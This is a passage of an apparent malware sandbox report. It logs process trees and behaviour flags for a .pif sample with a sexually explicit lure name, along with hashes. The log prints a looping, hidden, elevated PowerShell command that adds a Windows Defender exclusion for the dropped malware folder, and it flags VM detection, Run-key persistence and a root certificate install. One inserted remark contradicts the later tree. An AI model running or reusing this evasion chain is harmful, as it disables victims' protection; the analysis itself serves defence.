    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1

  PID 4844  msedge.exe (audio service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2896 /prefetch:8

  PID 4896  msedge.exe (video capture service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1892 /prefetch:8
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses

  PID 2236  msedge.exe (renderer, client id 20)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1

  PID 4100  msedge.exe (renderer, client id 22)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:1

  PID 5676  msedge.exe (quarantine service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  PID 3888  msedge.exe (renderer, client id 25)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

  PID 3716  msedge.exe (quarantine service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  PID 428  msedge.exe (collections data manager)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5608 /prefetch:8

  PID 5448  msedge.exe (renderer, client id 28)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1

  PID 5624  msedge.exe (renderer, client id 29)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

  PID 5216  msedge.exe (renderer, client id 31)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

The captured tree ends here. The sample's own processes referenced in the Signatures section (winrar-x64-701.exe, the .pif, InputSvc.exe, powershell.exe, wmic.exe, 7zG.exe, taskmgr.exe, vlc.exe, OpenWith.exe) are not present in the captured portion, so their parent/child relationships and command lines cannot be read from this report. PIDs are reused over the run: 5216 appears for two different renderers, and 2236 is both a renderer here and winrar-x64-701.exe in the "Executes dropped EXE" list.
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1288 /prefetch:82⤵PID:4956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5592 -
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2236 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:12⤵PID:1924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:12⤵PID:6020
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:5688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:12⤵PID:3256
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4028 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4660 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5780 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:5668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4944 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:2508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:5360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:12⤵PID:5124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:5636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1804 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:5436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:12⤵PID:3768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:12⤵PID:5700
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4596
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3100
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5384 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\c95482.rar"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5492
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5756
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2808
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5560
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap24871:74:7zEvent319441⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
C:\Users\Admin\Downloads\Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif"C:\Users\Admin\Downloads\Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif"1⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Looks for VMWare drivers on disk
- Executes dropped EXE
- Adds Run key to start application
PID:1032 -
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5516 -
C:\Windows\system32\cmd.execmd /C "PowerShell.exe -Command while($true){try{Start-Process \"cmd.exe\" -Verb runas -ArgumentList \"/c\", 'cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\WindowsInputSvc\"';exit}catch{}}"2⤵PID:3212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -Command while($true){try{Start-Process \"cmd.exe\" -Verb runas -ArgumentList \"/c\", 'cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\WindowsInputSvc\"';exit}catch{}}3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"4⤵PID:1208
-
C:\Windows\system32\cmd.execmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"5⤵PID:5328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6072 -
C:\Windows\system32\cmd.execmd /C "start C:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exe"2⤵PID:456
-
C:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exeC:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exe3⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Looks for VMWare drivers on disk
- Executes dropped EXE
- Modifies system certificate store
PID:4504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.bing.com/search?q=t4pfwd.exe t4pfwd.exe"1⤵PID:6040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe1ff746f8,0x7ffe1ff74708,0x7ffe1ff747182⤵PID:5712
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Modify Registry (2)
  Subvert Trust Controls (1)
    Install Root Certificate (1)
  Virtualization/Sandbox Evasion (4)
Downloads
- Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

- Filesize: 152B
  MD5: 537815e7cc5c694912ac0308147852e4
  SHA1: 2ccdd9d9dc637db5462fe8119c0df261146c363c
  SHA256: b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
  SHA512: 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a

- Filesize: 152B
  MD5: 8b167567021ccb1a9fdf073fa9112ef0
  SHA1: 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898
  SHA256: 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
  SHA512: 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54

- Filesize: 4.1MB
  MD5: de5d4c61f0017583997b7902ddc58e2e
  SHA1: b594f4e3ce549c848ee61dafdf78a1911dcd42f4
  SHA256: 41eb6ff7c6d5cf52293d5f3f9cddb08c0b42f308087aefdd04d079618eb457b0
  SHA512: 3f89322f58e5db481cb3eb46a78366baa755f70439c2a96cd5c1cbb87de986c40859a8f71abfccbd4e660d64a3fd506fbec99881a7dda217b6217f3afc9a42ba

- Filesize: 36KB
  MD5: 29275fefce2934df742efb191686aa38
  SHA1: a0480736da9dea050409dd49396303c6db12cd26
  SHA256: 3535e041511aa95b037d0680b00e0d7cd309cbe8af0ce1dc093b0301020f1841
  SHA512: b3a969ac8cca8f128de3a0e0075a0f4a863b96d56bdbe4f3737311db7e82bc6048ac7969158e9a50acc3685bf6e5eddcc3b45bde99ad375a76a96e4dda4e4c53

- Filesize: 62KB
  MD5: c3c0eb5e044497577bec91b5970f6d30
  SHA1: d833f81cf21f68d43ba64a6c28892945adc317a6
  SHA256: eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb
  SHA512: 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

- Filesize: 69KB
  MD5: aac57f6f587f163486628b8860aa3637
  SHA1: b1b51e14672caae2361f0e2c54b72d1107cfce54
  SHA256: 0cda72f2d9b6f196897f58d5de1fe1b43424ce55701eac625e591a0fd4ce7486
  SHA512: 0622796aab85764434e30cbe78b4e80e129443744dd13bc376f7a124ed04863c86bb1dcd5222bb1814f6599accbd45c9ee2b983da6c461b68670ae59141a6c1a

- Filesize: 39KB
  MD5: cd1f47da2575e2b93805c9a5d289b995
  SHA1: f4c2fd1e99bfb831523f36377559ccddf8cc8df3
  SHA256: fa0b04f90f25bf3aecdb0ee74f5f76c4119adbb4a019fc3fb70bcb5b496b4ddc
  SHA512: 008ac0c1867d5990f647dc0fc8019939cb1cd3bdd89c9ed35c5d8494febc2f5aec7e4d3c07dd30bf77c62b560c79810f7132e49c03725f555643dde69ad67098

- Filesize: 19KB
  MD5: 2e86a72f4e82614cd4842950d2e0a716
  SHA1: d7b4ee0c9af735d098bff474632fc2c0113e0b9c
  SHA256: c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
  SHA512: 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

- Filesize: 63KB
  MD5: 710d7637cc7e21b62fd3efe6aba1fd27
  SHA1: 8645d6b137064c7b38e10c736724e17787db6cf3
  SHA256: c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b
  SHA512: 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

- Filesize: 88KB
  MD5: b38fbbd0b5c8e8b4452b33d6f85df7dc
  SHA1: 386ba241790252df01a6a028b3238de2f995a559
  SHA256: b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd
  SHA512: 546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

- Filesize: 1.2MB
  MD5: 1697e7a82ed549b1fc21b2c26649a1e9
  SHA1: e749a0188a76490dcaa100ed461362927ae8e127
  SHA256: ddd55f508a01efa588bcb5097b6d7de823c500442675887949c9965210fce66e
  SHA512: affe7abc48559448e9d7ee7c119bcbb94a6a5daf8cf5c1703669575af5be214422eb7ab6daac6d15b41af81a78772fa5b53ced323045cc4b2516fc9b43370531

- Filesize: 33KB
  MD5: 3cd0f2f60ab620c7be0c2c3dbf2cda97
  SHA1: 47fad82bfa9a32d578c0c84aed2840c55bd27bfb
  SHA256: 29a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b
  SHA512: ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb

- Filesize: 75KB
  MD5: cf989be758e8dab43e0a5bc0798c71e0
  SHA1: 97537516ffd3621ffdd0219ede2a0771a9d1e01d
  SHA256: beeca69af7bea038faf8f688bf2f10fda22dee6d9d9429306d379a7a4be0c615
  SHA512: f8a88edb6bcd029ad02cba25cae57fdf9bbc7fa17c26e7d03f09040eb0559bc27bd4db11025706190ae548363a1d3b3f95519b9740e562bb9531c4d51e3ca2b7

- Filesize: 30KB
  MD5: 888c5fa4504182a0224b264a1fda0e73
  SHA1: 65f058a7dead59a8063362241865526eb0148f16
  SHA256: 7d757e510b1f0c4d44fd98cc0121da8ca4f44793f8583debdef300fb1dbd3715
  SHA512: 1c165b9cf4687ff94a73f53624f00da24c5452a32c72f8f75257a7501bd450bff1becdc959c9c7536059e93eb87f2c022e313f145a41175e0b8663274ae6cc36

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 1KB
  MD5: b391e405a026c611af259a8ed1dfa836
  SHA1: 6e93aeaa32ace21acc93b79238c5cf8bb5ba7a8a
  SHA256: 0572ca1ef04de840046c9a3d3fd5ea85a95d0cf6e923bfd7dfdf50819c893069
  SHA512: e060c4f74f5c0e8219772f161425e2aa5323182999b0efbf40fe8c7acda058c04b0ef2dddcc83a517532003192f2d7bc9a85c7220c8c0d3dda47722ed20798cd

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 2KB
  MD5: 8e97179808466dc78db7d5f80c7db84c
  SHA1: f1186eafc152423887a6537d00a9c5c865fbcb1d
  SHA256: 5c616c9dbd67ca290c24485c58e4cd7ef0625f385b35b90550919e52deb7fa20
  SHA512: 16d62016ab36a158748ecdb3233dc15c9a15a35f0bb06e8637176432f9cfbfc3532ff3dc1bf69af70d8a219965d3c74a343888ae9c916fbabd75dd2c0d7c113e

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 2KB
  MD5: 47e41cfadb94971ca9bb717337e2dfdd
  SHA1: 5fb5322ef5187e27f5dbb3a185f49d69010d22f6
  SHA256: 6b9fb97eaaec15fc52a424aa8cb5f343d286e04c92e7445aa40cb4ae7767f842
  SHA512: 9ef325f4bdd831f3da8c085ced384cf37b8785321a0cbea3a5b45961510ec500b84567d70771f589057227d5090fb5db308ab03d45e49c621150bf29bcc21184

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 2KB
  MD5: 763cbe156d610b5de90f74dd51a04cc8
  SHA1: a0a1d716798fc368811a680c54ae9779d03b9fb7
  SHA256: 421046e5831ef90ced271e07cc6fe121ae2263dd9b813c2501ee3eb229c471dc
  SHA512: 63df97876a3eb3c95516335f6fcea1721d9a9e86dd28a89af93315c32bf5b632b6be6ed321d64083cf9dca43a51184c28366326dbb6c3b3d59d83b3e41cfde6c
- Filesize: 617B
  MD5: 2f5e4c46b20b5dce0ccdef02c3b3ed91
  SHA1: c5ab97ed963e49c6958295a8f7965ef035ff4f11
  SHA256: 2c90cface7001442322a7dc80f3399b624797066da9e173852760addcad6aa63
  SHA512: 598ea7e4c5572ba279f6d3b846abd0d19e290179da984cf3849051736ccebe1c7fa6bfcbc6c0ec4a263b5c4e9071ef86480d576ae0934be854d20ae26db5f3a1

- Filesize: 544B
  MD5: db8e343e6439474ab4a937f13542c3b8
  SHA1: 86123381ad96497b1c474f5681713a71e577435b
  SHA256: 194415b12de7a96dd14e52acaadcb0d775fe871ec03b05964f4e28ec4e854eb0
  SHA512: 5929591b611fe45e79cce2849be81c467b6c117c655473e6c8c9d765ae366d693f2dad96eb35b24c79a4b28c9976dcdbbc9d58ffd1ef8dc73fdcedd95f033615

- Filesize: 472B
  MD5: ab7e3a2b6bd688721dcda38dbe834770
  SHA1: 4f1366baf74af615eb38bb99edfb2aa08e5d6fbc
  SHA256: 3b1f57d48836a63b10d9566c5057dc95ea3cf098eac914d0e1ff8aac94ebb864
  SHA512: d1b7eefd50592516f008d364ebe8195ac966373a1d8744c493e07c5d57b9006b39563758faa025ee4307c9a1f94c34849c5ff67c047a4c0d9298710fd007256c

- Filesize: 6KB
  MD5: 7933701b21b98983558be7c0097021f8
  SHA1: 3c74e7a74b1a214f786db8f629efcdb761ff87d3
  SHA256: 29b183ebb23e85349a69e5bfe43ac42c768080ad3362c533b8ed186c7cbbb053
  SHA512: c08d7fd28b49e8a75a6534d46d14f7c271663ba0e764ea08167e0478f0f11e6e6ace95d836c58b813955e4d30f24c1c5579b7bbbbed89454d659a37cd0769657

- Filesize: 5KB
  MD5: 370c417b1421a6c27f6e4ed365561c5c
  SHA1: 6650f168352f4d8a480571783ad17277011b0dad
  SHA256: c6705064ce135ecf6e1ead9e14561e050fae9059d8794a65f7a79fbe4a6b6ab4
  SHA512: f8da0cb3cda659b7706194e194c1fa683868e8829319a8958c375f8316b4a4213bfa4182c8680b8580ffd420b8966915eee6160b70132684d89ede3658ec2422

- Filesize: 6KB
  MD5: dc640c504a71a8bd39d9fb892a6d5566
